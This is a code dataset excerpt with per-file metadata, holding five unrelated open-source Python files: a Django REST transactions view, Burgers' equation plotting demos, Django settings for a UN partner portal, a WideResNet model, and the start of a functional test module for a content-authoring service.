repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
silverapp/silver
|
silver/api/views/transaction_views.py
|
1
|
4548
|
# Copyright (c) 2015 Presslabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from uuid import UUID
from django_filters.rest_framework import DjangoFilterBackend
from django_fsm import TransitionNotAllowed
from django.http import Http404
from rest_framework import permissions, status
from rest_framework.generics import ListCreateAPIView, get_object_or_404, RetrieveUpdateAPIView
from rest_framework.response import Response
from rest_framework.views import APIView
from silver.api.filters import TransactionFilter
from silver.api.serializers.transaction_serializers import TransactionSerializer
from silver.models import PaymentMethod, Transaction
class TransactionList(ListCreateAPIView):
permission_classes = (permissions.IsAuthenticated,)
serializer_class = TransactionSerializer
filter_backends = (DjangoFilterBackend,)
filterset_class = TransactionFilter
def get_queryset(self):
customer_pk = self.kwargs.get('customer_pk', None)
payment_method_id = self.kwargs.get('payment_method_id')
if payment_method_id:
payment_method = get_object_or_404(PaymentMethod,
id=payment_method_id,
customer__pk=customer_pk)
return Transaction.objects.filter(
payment_method=payment_method
)
else:
return Transaction.objects.filter(
payment_method__customer__pk=customer_pk
)
def perform_create(self, serializer):
payment_method_id = self.kwargs.get('payment_method_id')
if payment_method_id:
payment_method = get_object_or_404(PaymentMethod,
id=payment_method_id)
serializer.save(payment_method=payment_method)
else:
serializer.save()
class TransactionDetail(RetrieveUpdateAPIView):
permission_classes = (permissions.AllowAny,)
serializer_class = TransactionSerializer
http_method_names = ('get', 'patch', 'head', 'options')
def get_object(self):
transaction_uuid = self.kwargs.get('transaction_uuid', None)
try:
uuid = UUID(transaction_uuid, version=4)
except ValueError:
raise Http404
return get_object_or_404(Transaction, uuid=uuid)
class TransactionAction(APIView):
permission_classes = (permissions.IsAuthenticated,)
allowed_actions = ('cancel', )
def post(self, request, *args, **kwargs):
transaction = self.get_object(**kwargs)
requested_action = kwargs.get('requested_action')
if requested_action not in self.allowed_actions:
error_message = "{} is not an allowed".format(requested_action)
return Response({"errors": error_message},
status=status.HTTP_400_BAD_REQUEST)
action_to_execute = getattr(transaction, requested_action, None)
if not action_to_execute:
raise Http404
try:
errors = action_to_execute()
transaction.save()
except TransitionNotAllowed:
errors = "Can't execute action because the transaction is in an " \
"incorrect state: {}".format(transaction.state)
if errors:
return Response({"errors": errors},
status=status.HTTP_400_BAD_REQUEST)
transaction_serialized = TransactionSerializer(transaction,
context={'request': request})
return Response(transaction_serialized.data,
status=status.HTTP_200_OK)
def get_object(self, **kwargs):
transaction_uuid = kwargs.get('transaction_uuid')
customer_pk = kwargs.get('customer_pk')
return get_object_or_404(
Transaction.objects.all(),
uuid=transaction_uuid,
payment_method__customer__pk=customer_pk
)
|
apache-2.0
| 2,897,298,705,134,729,000
| 35.97561
| 95
| 0.645339
| false
| 4.593939
| false
| false
| false
|
maojrs/riemann_book
|
exact_solvers/burgers_demos.py
|
2
|
10422
|
"""
Additional functions and demos for Burgers' equation.
"""
import sys, os
from clawpack import pyclaw
from clawpack import riemann
import matplotlib
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import HTML
import numpy as np
from utils import riemann_tools
from . import burgers
def multivalued_solution(t,fig=0):
"""Plots bump-into-wave figure at different times for interactive figure."""
if fig==0:
fig = plt.figure()
x = np.arange(-11.0,11.0,0.1)
y = np.exp(-x*x/10)
x2 = 1.0*x
x2 = x2 + t*y
plt.plot(x, y, '--k', label = "Initial Condition")
plt.plot(x2, y, '-k', label = r"Solution at time $t$")
plt.xlim([-10,10])
plt.legend(loc = 'upper left')
plt.title('t = %.2f' % t)
if t != 0:
numarrows = 7
arrowIndexList = np.linspace(len(x)/3,2*len(x)/3,numarrows, dtype = int)
for i in arrowIndexList:
plt.arrow(x[i], y[i], np.abs(t*y[i]-0.4), 0, head_width=0.02, head_length=0.4, fc='k', ec='k')
if fig==0: plt.show()
def shock():
"""Returns plot function for a shock solution."""
q_l, q_r = 5.0, 1.0
states, speeds, reval, wave_type = burgers.exact_riemann_solution(q_l ,q_r)
plot_function = riemann_tools.make_plot_function(states, speeds, reval, wave_type,
layout='horizontal',
variable_names=['q'],
plot_chars=[burgers.speed])
return plot_function
def shock_location(xshock=7.75,fig=0):
"""Plots equal-area shock figure for different shock positions for interactive figure."""
if fig==0:
fig = plt.figure()
t=10
x = np.arange(-11.0,11.0,0.05)
y = np.exp(-x*x/10)
x = x + t*y
x2 = 1.0*x
y2 = 1.0*y
region = -1
for i in range(len(x)):
if (x2[i] >= xshock and region == -1):
region = 0
maxy = 1.0*y[i-1]
if (x2[i] >= xshock and region == 0):
x2[i] = 1.0*xshock
y2[i] = 1.0*maxy
if (x2[i] < xshock and region == 0):
region = 1
maxy = 1.0*y[i-1]
if (x2[i] <= xshock and region == 1):
x2[i] = 1.0*xshock
y2[i] = 1.0*maxy
if (x2[i] > xshock and region == 1):
region = 2
plt.plot(x, y, '-k', lw = 2, label = "Multivalued solution")
plt.plot(x2, y2, '--r', lw = 2, label = "Shock solution")
if (xshock == 7.75):
plt.annotate(r"$A_1$", xy=(2, 0), xytext=(8.5,0.83), fontsize=15)
plt.annotate(r"$A_2$", xy=(2, 0), xytext=(6.5,0.15), fontsize=15)
plt.annotate(r"Equal Areas", xy=(2, 0), xytext=(-3,0.62), fontsize=15)
plt.annotate(r"$A_1=A_2$", xy=(2, 0), xytext=(-2.5,0.5), fontsize=15)
plt.xlim([-7.5,11])
plt.legend(loc = 'upper left')
if fig==0: plt.show()
def rarefaction_figure(t):
"""Plots rarefaction figure at different times for interactive figure."""
numarrows = 6
x = [-5., 0.0]
y = [0.2, 0.2]
for i in range(numarrows):
x.append(0.0)
y.append(y[0] + (i+1)*(1.0-y[0])/(numarrows+1))
x.extend([0.0,10.0])
y.extend([1.0,1.0])
x2 = 1.0*np.array(x)
x2[1:-1] = x2[1:-1] + t*np.array(y[1:-1])
plt.plot(x, y, '--k', label = "Initial Condition")
plt.plot(x2, y, '-k', label = r"Solution at time $t$")
plt.xlim([-5,10])
plt.ylim([0.0,1.2])
plt.legend(loc = 'upper left')
plt.title('t = %.2f' % t)
if t != 0:
for i in range(numarrows):
plt.arrow(x[2+i], y[2+i], np.abs(t*y[2+i]-0.4), 0, head_width=0.02, head_length=0.4, fc='k', ec='k')
plt.annotate(r"$q_r t$", xy=(2, 1), xytext=(t/2-0.2, 1.05), fontsize=12)
if t > 2:
plt.annotate(r"$q_\ell t$", xy=(2, 0), xytext=(t/8-0.4, 0.12), fontsize=12)
plt.arrow(t/2-0.3, 1.07, -t/2+0.8, 0, head_width=0.02, head_length=0.4, fc='k', ec='k')
plt.arrow(t/2+0.7, 1.07, t*y[-1] - t/2 - 1, 0, head_width=0.02, head_length=0.4, fc='k', ec='k')
def rarefaction():
"""Returns plot function for a rarefaction solution."""
q_l, q_r = 2.0, 4.0
states, speeds, reval, wave_type = burgers.exact_riemann_solution(q_l ,q_r)
plot_function = riemann_tools.make_plot_function(states, speeds, reval, wave_type,
layout='horizontal',
variable_names=['q'],
plot_chars=[burgers.speed])
return plot_function
def unphysical():
"""Returns plot function for an unphysical solution."""
q_l, q_r = 1.0, 5.0
states, speeds, reval, wave_type = burgers.unphysical_riemann_solution(q_l ,q_r)
plot_function = riemann_tools.make_plot_function(states, speeds, reval, wave_type,
layout='horizontal',
variable_names=['q'],
plot_chars=[burgers.speed])
return plot_function
def bump_animation(numframes):
"""Plots animation of solution with bump initial condition,
using pyclaw (calls bump_pyclaw)."""
x, frames = bump_pyclaw(numframes)
fig = plt.figure()
ax = plt.axes(xlim=(-1, 1), ylim=(-0.2, 1.2))
line, = ax.plot([], [], '-k', lw=2)
def fplot(frame_number):
frame = frames[frame_number]
pressure = frame.q[0,:]
line.set_data(x,pressure)
return line,
anim = animation.FuncAnimation(fig, fplot, frames=len(frames), interval=30)
plt.close('all')
#return HTML(anim.to_jshtml())
return anim.to_jshtml()
def bump_pyclaw(numframes):
"""Returns pyclaw solution of bump initial condition."""
# Set pyclaw for burgers equation 1D
claw = pyclaw.Controller()
claw.tfinal = 1.5 # Set final time
claw.keep_copy = True # Keep solution data in memory for plotting
claw.output_format = None # Don't write solution data to file
claw.num_output_times = numframes # Number of output frames
claw.solver = pyclaw.ClawSolver1D(riemann.burgers_1D) # Choose burgers 1D Riemann solver
claw.solver.all_bcs = pyclaw.BC.periodic # Choose periodic BCs
claw.verbosity = False # Don't print pyclaw output
domain = pyclaw.Domain( (-1.,), (1.,), (500,)) # Choose domain and mesh resolution
claw.solution = pyclaw.Solution(claw.solver.num_eqn,domain)
# Set initial condition
x=domain.grid.x.centers
claw.solution.q[0,:] = np.exp(-10 * (x)**2)
claw.solver.dt_initial = 1.e99
# Run pyclaw
status = claw.run()
return x, claw.frames
def triplestate_animation(ql, qm, qr, numframes):
"""Plots animation of solution with triple-state initial condition, using pyclaw (calls
triplestate_pyclaw). Also plots characteristic structure by plotting contour plots of the
solution in the x-t plane """
# Get solution for animation and set plot
x, frames = triplestate_pyclaw(ql, qm, qr, numframes)
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9,4))
ax1.set_xlim(-3, 3)
ax1.set_ylim(-3, 5)
ax2.set_xlim(-3, 3)
ax2.set_ylim(0, 2)
ax1.set_title('Solution q(x)')
ax1.set_xlabel('$x$')
ax1.set_ylabel('$q$')
ax2.set_title('Characteristics')
ax2.set_xlabel('$x$')
ax2.set_ylabel('$t$')
matplotlib.rcParams['contour.negative_linestyle'] = 'solid'
line1, = ax1.plot([], [], '-k', lw=2)
# Contour plot of high-res solution to show characteristic structure in xt-plane
meshpts = 2400
numframes2 = 600
x2, frames2 = triplestate_pyclaw(ql, qm, qr, numframes2)
characs = np.zeros([numframes2,meshpts])
xx = np.linspace(-12,12,meshpts)
tt = np.linspace(0,2,numframes2)
for j in range(numframes2):
characs[j] = frames2[j].q[0]
X,T = np.meshgrid(xx,tt)
ax2.contour(X, T, characs, levels=np.linspace(ql, ql+0.11 ,20), linewidths=0.5, colors='k')
ax2.contour(X, T, characs, levels=np.linspace(qm+0.11, qm+0.13 ,7), linewidths=0.5, colors='k')
ax2.contour(X, T, characs, levels=np.linspace(qr+0.13, qr+0.2 ,15), linewidths=0.5, colors='k')
ax2.contour(X, T, characs, 12, linewidths=0.5, colors='k')
#ax2.contour(X, T, characs, 38, colors='k')
# Add animated time line to xt-plane
line2, = ax2.plot(x, 0*x , '--k')
line = [line1, line2]
# Update data function for animation
def fplot(frame_number):
frame = frames[frame_number]
pressure = frame.q[0,:]
line[0].set_data(x,pressure)
line[1].set_data(x,0*x+frame.t)
return line
anim = animation.FuncAnimation(fig, fplot, frames=len(frames), interval=30, blit=False)
plt.close('all')
#return HTML(anim.to_jshtml())
return anim.to_jshtml()
def triplestate_pyclaw(ql, qm, qr, numframes):
"""Returns pyclaw solution of triple-state initial condition."""
# Set pyclaw for burgers equation 1D
meshpts = 2400 #600
claw = pyclaw.Controller()
claw.tfinal = 2.0 # Set final time
claw.keep_copy = True # Keep solution data in memory for plotting
claw.output_format = None # Don't write solution data to file
claw.num_output_times = numframes # Number of output frames
claw.solver = pyclaw.ClawSolver1D(riemann.burgers_1D) # Choose burgers 1D Riemann solver
claw.solver.all_bcs = pyclaw.BC.extrap # Choose periodic BCs
claw.verbosity = False # Don't print pyclaw output
domain = pyclaw.Domain( (-12.,), (12.,), (meshpts,)) # Choose domain and mesh resolution
claw.solution = pyclaw.Solution(claw.solver.num_eqn,domain)
# Set initial condition
x=domain.grid.x.centers
q0 = 0.0*x
xtick1 = 900 + int(meshpts/12)
xtick2 = xtick1 + int(meshpts/12)
for i in range(xtick1):
q0[i] = ql + i*0.0001
#q0[0:xtick1] = ql
for i in np.arange(xtick1, xtick2):
q0[i] = qm + i*0.0001
#q0[xtick1:xtick2] = qm
for i in np.arange(xtick2, meshpts):
q0[i] = qr + i*0.0001
#q0[xtick2:meshpts] = qr
claw.solution.q[0,:] = q0
claw.solver.dt_initial = 1.e99
# Run pyclaw
status = claw.run()
return x, claw.frames
|
bsd-3-clause
| 5,794,931,405,617,469,000
| 38.477273
| 112
| 0.572059
| false
| 2.933296
| false
| false
| false
|
unicef/un-partner-portal
|
backend/unpp_api/settings/base.py
|
1
|
10700
|
from __future__ import absolute_import
import os
import sys
####
# Change per project
####
from django.urls import reverse_lazy
from django.utils.text import slugify
PROJECT_NAME = 'unpp_api'
# project root and add "apps" to the path
PROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.join(PROJECT_ROOT, 'apps/'))
# domains/hosts etc.
DOMAIN_NAME = os.getenv('DJANGO_ALLOWED_HOST', 'localhost')
WWW_ROOT = 'http://%s/' % DOMAIN_NAME
ALLOWED_HOSTS = [DOMAIN_NAME]
FRONTEND_HOST = os.getenv('UNPP_FRONTEND_HOST', DOMAIN_NAME)
####
# Other settings
####
ADMINS = (
('Alerts', os.getenv('ALERTS_EMAIL') or 'admin@unpartnerportal.com'),
('Tivix', f'unicef-unpp+{slugify(DOMAIN_NAME)}@tivix.com'),
)
SANCTIONS_LIST_URL = 'https://scsanctions.un.org/resources/xml/en/consolidated.xml'
SITE_ID = 1
TIME_ZONE = 'UTC'
LANGUAGE_CODE = 'en-us'
USE_I18N = True
SECRET_KEY = os.getenv('SECRET_KEY')
DEFAULT_CHARSET = 'utf-8'
ROOT_URLCONF = 'unpp_api.urls'
DATA_VOLUME = os.getenv('DATA_VOLUME', '/data')
ALLOWED_EXTENSIONS = (
'pdf', 'doc', 'docx', 'xls', 'xlsx' 'img', 'png', 'jpg', 'jpeg', 'csv', 'zip'
)
UPLOADS_DIR_NAME = 'uploads'
MEDIA_URL = f'/api/{UPLOADS_DIR_NAME}/'
MEDIA_ROOT = os.getenv('UNPP_UPLOADS_PATH', os.path.join(DATA_VOLUME, UPLOADS_DIR_NAME))
FILE_UPLOAD_MAX_MEMORY_SIZE = 25 * 1024 * 1024 # 25mb
DATA_UPLOAD_MAX_MEMORY_SIZE = 50 * 1024 * 1024
# static resources related. See documentation at: http://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/
STATIC_URL = '/api/static/'
STATIC_ROOT = f'{DATA_VOLUME}/staticserve'
# static serving
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder",
)
DEBUG = True
IS_DEV = False
IS_STAGING = False
IS_PROD = False
UN_SANCTIONS_LIST_EMAIL_ALERT = 'test@tivix.com' # TODO - change to real one
DEFAULT_FROM_EMAIL = os.getenv('DEFAULT_FROM_EMAIL', 'UNPP Stage <noreply@unpartnerportal.org>')
EMAIL_HOST = os.getenv('EMAIL_HOST')
EMAIL_PORT = os.getenv('EMAIL_PORT')
EMAIL_HOST_USER = os.getenv('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.getenv('EMAIL_HOST_PASSWORD')
EMAIL_USE_TLS = os.getenv('EMAIL_USE_TLS', '').lower() == 'true'
# Get the ENV setting. Needs to be set in .bashrc or similar.
ENV = os.getenv('ENV')
if not ENV:
raise Exception('Environment variable ENV is required!')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.getenv('POSTGRES_DB'),
'USER': os.getenv('POSTGRES_USER'),
'PASSWORD': os.getenv('POSTGRES_PASSWORD'),
'HOST': os.getenv('POSTGRES_HOST'),
'PORT': 5432,
}
}
POSTGRES_SSL_MODE = os.getenv('POSTGRES_SSL_MODE', 'off')
if POSTGRES_SSL_MODE == 'on':
DATABASES['default'].update({'OPTIONS': {"sslmode": 'require'}})
MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'account.authentication.CustomSocialAuthExceptionMiddleware',
'common.middleware.ActivePartnerMiddleware',
'common.middleware.ActiveAgencyOfficeMiddleware',
'common.middleware.ClientTimezoneMiddleware',
]
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.static',
'django.template.context_processors.request',
],
},
},
]
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.humanize',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'django_filters',
'imagekit',
'django_countries',
'mail_templated',
'social_django',
'sequences.apps.SequencesConfig',
'django_nose',
'background_task',
'common',
'account',
'agency',
'partner',
'project',
'review',
'storages',
'notification',
'sanctionslist',
'management',
'reports',
'externals',
]
# auth / django-registration params
AUTH_USER_MODEL = 'account.User'
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS': {
'min_length': 12,
}
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
PASSWORD_RESET_TIMEOUT_DAYS = 31
ACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS = 7
AUTHENTICATION_BACKENDS = [
'django.contrib.auth.backends.ModelBackend',
'account.authentication.CustomAzureADBBCOAuth2',
]
# Django-social-auth settings
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_KEY = os.getenv('AZURE_B2C_CLIENT_ID', None)
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_SECRET = os.getenv('AZURE_B2C_CLIENT_SECRET', None)
SOCIAL_AUTH_URL_NAMESPACE = 'social'
SOCIAL_AUTH_SANITIZE_REDIRECTS = True
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_POLICY = os.getenv('AZURE_B2C_POLICY_NAME', "b2c_1A_UNICEF_PARTNERS_signup_signin")
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_PW_RESET_POLICY = os.getenv(
'AZURE_B2C_PW_RESET_POLICY_NAME', "B2C_1_PasswordResetPolicy"
)
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_TENANT_ID = os.getenv('AZURE_B2C_TENANT', 'unicefpartners.onmicrosoft.com')
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_SCOPE = [
'openid', 'email', 'profile',
]
IGNORE_DEFAULT_SCOPE = True
SOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = True
SOCIAL_AUTH_PROTECTED_USER_FIELDS = ['email']
SOCIAL_AUTH_LOGIN_REDIRECT_URL = reverse_lazy('accounts:social-logged-in')
SOCIAL_AUTH_PIPELINE = (
'account.authentication.social_details',
'social_core.pipeline.social_auth.social_uid',
'social_core.pipeline.social_auth.auth_allowed',
'social_core.pipeline.social_auth.social_user',
'social_core.pipeline.user.get_username',
'account.authentication.require_email',
'social_core.pipeline.social_auth.associate_by_email',
'account.authentication.create_user',
'social_core.pipeline.social_auth.associate_user',
'social_core.pipeline.social_auth.load_extra_data',
'account.authentication.user_details',
)
SOCIAL_AUTH_AZUREAD_B2C_OAUTH2_USER_FIELDS = [
'email', 'fullname'
]
TEST_RUNNER = os.getenv('DJANGO_TEST_RUNNER', 'django.test.runner.DiscoverRunner')
NOSE_ARGS = ['--with-timer', '--nocapture', '--nologcapture']
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'TEST_REQUEST_DEFAULT_FORMAT': 'json',
}
REST_AUTH_SERIALIZERS = {
'LOGIN_SERIALIZER': 'account.serializers.CustomLoginSerializer',
'USER_DETAILS_SERIALIZER': 'account.serializers.SimpleAccountSerializer',
'PASSWORD_RESET_SERIALIZER': 'account.serializers.CustomPasswordResetSerializer',
}
# helper function to extend all the common lists
def extend_list_avoid_repeats(list_to_extend, extend_with):
"""Extends the first list with the elements in the second one, making sure its elements are not already there in the
original list."""
list_to_extend.extend(filter(lambda x: not list_to_extend.count(x), extend_with))
LOG_LEVEL = 'DEBUG' if DEBUG and 'test' not in sys.argv else 'INFO'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s line %(lineno)d: %(message)s'
},
'verbose': {
'format': '[%(asctime)s][%(levelname)s][%(name)s] %(filename)s.%(funcName)s:%(lineno)d %(message)s',
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'default': {
'level': LOG_LEVEL,
'class': 'logging.StreamHandler',
'formatter': 'standard',
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'include_html': True,
}
},
'loggers': {
'': {
'handlers': ['default'],
'level': 'INFO',
'propagate': True
},
'console': {
'handlers': ['default'],
'level': 'DEBUG',
'propagate': True
},
'django.request': {
'handlers': ['mail_admins', 'default'],
'level': 'ERROR',
'propagate': False,
},
'django.security.DisallowedHost': {
# Skip "SuspiciousOperation: Invalid HTTP_HOST" e-mails.
'handlers': ['default'],
'propagate': False,
},
}
}
UNHCR_API_HOST = os.getenv('UNHCR_API_HOST')
UNHCR_API_USERNAME = os.getenv('UNHCR_API_USERNAME')
UNHCR_API_PASSWORD = os.getenv('UNHCR_API_PASSWORD')
UNICEF_PARTNER_DETAILS_URL = os.getenv('UNICEF_PARTNER_DETAILS_URL')
UNICEF_API_USERNAME = os.getenv('UNICEF_API_USERNAME')
UNICEF_API_PASSWORD = os.getenv('UNICEF_API_PASSWORD')
WFP_API_HOST = os.getenv('WFP_API_HOST')
WFP_API_TOKEN = os.getenv('WFP_API_TOKEN')
GIT_VERSION = os.getenv('GIT_VERSION', 'UNKNOWN')
REDIS_INSTANCE = os.getenv('REDIS_INSTANCE')
if REDIS_INSTANCE:
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': f'redis://{REDIS_INSTANCE}/1',
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
},
'TIMEOUT': 3600
}
}
DJANGO_REDIS_IGNORE_EXCEPTIONS = not DEBUG
else:
CACHES = {
'default': {
'BACKEND': 'common.cache_backends.DummyRedisCache',
'LOCATION': 'unpp'
}
}
SESSION_COOKIE_HTTPONLY = True
SESSION_ENGINE = "django.contrib.sessions.backends.signed_cookies"
|
apache-2.0
| 250,126,248,760,582,600
| 30.378299
| 120
| 0.647477
| false
| 3.324014
| true
| false
| false
|
hendrycks/robustness
|
old/Icons-50/models/wrn.py
|
1
|
3908
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
def __init__(self, in_planes, out_planes, stride, dropRate=0.0):
super(BasicBlock, self).__init__()
self.bn1 = nn.BatchNorm2d(in_planes)
self.relu1 = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(out_planes)
self.relu2 = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(out_planes, out_planes, kernel_size=3, stride=1,
padding=1, bias=False)
self.droprate = dropRate
self.equalInOut = (in_planes == out_planes)
self.convShortcut = (not self.equalInOut) and nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride,
padding=0, bias=False) or None
def forward(self, x):
if not self.equalInOut:
x = self.relu1(self.bn1(x))
else:
out = self.relu1(self.bn1(x))
if self.equalInOut:
out = self.relu2(self.bn2(self.conv1(out)))
else:
out = self.relu2(self.bn2(self.conv1(x)))
if self.droprate > 0:
out = F.dropout(out, p=self.droprate, training=self.training)
out = self.conv2(out)
if not self.equalInOut:
return torch.add(self.convShortcut(x), out)
else:
return torch.add(x, out)
class NetworkBlock(nn.Module):
def __init__(self, nb_layers, in_planes, out_planes, block, stride, dropRate=0.0):
super(NetworkBlock, self).__init__()
self.layer = self._make_layer(block, in_planes, out_planes, nb_layers, stride, dropRate)
def _make_layer(self, block, in_planes, out_planes, nb_layers, stride, dropRate):
layers = []
for i in range(nb_layers):
layers.append(block(i == 0 and in_planes or out_planes, out_planes, i == 0 and stride or 1, dropRate))
return nn.Sequential(*layers)
def forward(self, x):
return self.layer(x)
class WideResNet(nn.Module):
def __init__(self, depth, num_classes, widen_factor=1, dropRate=0.0):
super(WideResNet, self).__init__()
nChannels = [16, 16 * widen_factor, 32 * widen_factor, 64 * widen_factor]
assert ((depth - 4) % 6 == 0)
n = (depth - 4) // 6
block = BasicBlock
# 1st conv before any network block
self.conv1 = nn.Conv2d(3, nChannels[0], kernel_size=3, stride=1,
padding=1, bias=False)
# 1st block
self.block1 = NetworkBlock(n, nChannels[0], nChannels[1], block, 1, dropRate)
# 2nd block
self.block2 = NetworkBlock(n, nChannels[1], nChannels[2], block, 2, dropRate)
# 3rd block
self.block3 = NetworkBlock(n, nChannels[2], nChannels[3], block, 2, dropRate)
# global average pooling and classifier
self.bn1 = nn.BatchNorm2d(nChannels[3])
self.relu = nn.ReLU(inplace=True)
self.fc = nn.Linear(nChannels[3], num_classes)
self.nChannels = nChannels[3]
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.bias.data.zero_()
def forward(self, x):
out = self.conv1(x)
out = self.block1(out)
out = self.block2(out)
out = self.block3(out)
out = self.relu(self.bn1(out))
out = F.avg_pool2d(out, 8)
out = out.view(-1, self.nChannels)
return self.fc(out)
|
apache-2.0
| -3,741,773,476,238,839,300
| 39.708333
| 116
| 0.56781
| false
| 3.273032
| false
| false
| false
|
Connexions/cnx-authoring
|
cnxauthoring/tests/test_functional.py
|
1
|
173550
|
# -*- coding: utf-8 -*-
# ###
# Copyright (c) 2013, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
"""Functional tests of API."""
import datetime
import json
import os
import sys
import re
import unittest
from copy import deepcopy
try:
from unittest import mock # python 3
except ImportError:
import mock # python 2
try:
import urllib.request as urllib2 # renamed in python3
except ImportError:
import urllib2 # noqa python2
try:
from urllib.parse import urljoin
except:
from urlparse import urljoin
import cnxepub
import psycopg2
import pytz
import requests
from webtest import Upload
from wsgi_intercept import requests_intercept
from .intercept import (install_intercept, uninstall_intercept,
publishing_settings)
from .testing import integration_test_settings, get_data
from ..models import DEFAULT_LICENSE, TZINFO
USER_PROFILE = {
u'username': u'user1',
u'id': 1,
u'first_name': u'User',
u'last_name': u'One',
}
SUBMITTER = {
u'id': u'user1',
u'firstname': u'User',
u'surname': u'One',
u'fullname': u'User One',
u'type': u'cnx-id',
}
SUBMITTER_WITH_ACCEPTANCE = SUBMITTER.copy()
SUBMITTER_WITH_ACCEPTANCE[u'hasAccepted'] = True
SUBMITTER_WITH_ACCEPTANCE[u'requester'] = SUBMITTER['id']
class BaseFunctionalTestCase(unittest.TestCase):
accounts_request_return = ''
maxDiff = None
@classmethod
def setUpClass(cls):
cls.settings = settings = integration_test_settings()
# only run once for all the tests
# Install the intercept for archive and publishing.
install_intercept()
requests_intercept.install()
# make sure storage is set correctly in cnxauthoring.views by reloading
# cnxauthoring.views
if 'cnxauthoring.views' in sys.modules:
del sys.modules['cnxauthoring.views']
from .. import main
app = main({}, **settings)
from webtest import TestApp
cls.testapp = TestApp(app)
# Allow user1 to publish without moderation
with psycopg2.connect(
publishing_settings()['db-connection-string']) as db_conn:
with db_conn.cursor() as cursor:
cursor.execute("""\
INSERT INTO users
(username, first_name, last_name, is_moderated)
VALUES ('user1', 'User', 'One', true)""")
@classmethod
def tearDownClass(cls):
from ..storage import storage
if hasattr(storage, 'conn'):
storage.conn.close()
# Uninstall the intercept for archive and publishing.
requests_intercept.uninstall()
uninstall_intercept()
def setUp(self):
# All tests start with a login.
self.login()
self.addCleanup(self.logout)
def login(self, username='user1', password='password', login_url='/login',
headers=None):
headers = headers or {}
response = self.testapp.get(login_url, headers=headers, status=302)
response = self.testapp.post(response.headers['Location'], {
'username': username,
'password': password,
})
return self.testapp.get(response.headers['Location'])
def logout(self):
self.testapp.get('/logout', status=302)
def assert_cors_headers(self, response, cache_message_special_case=None):
self.assertEqual(response.headers['Access-Control-Allow-Credentials'],
'true')
self.assertEqual(response.headers['Access-Control-Allow-Origin'],
'http://localhost:8000')
self.assertEqual(response.headers['Access-Control-Allow-Headers'],
'Origin, Content-Type')
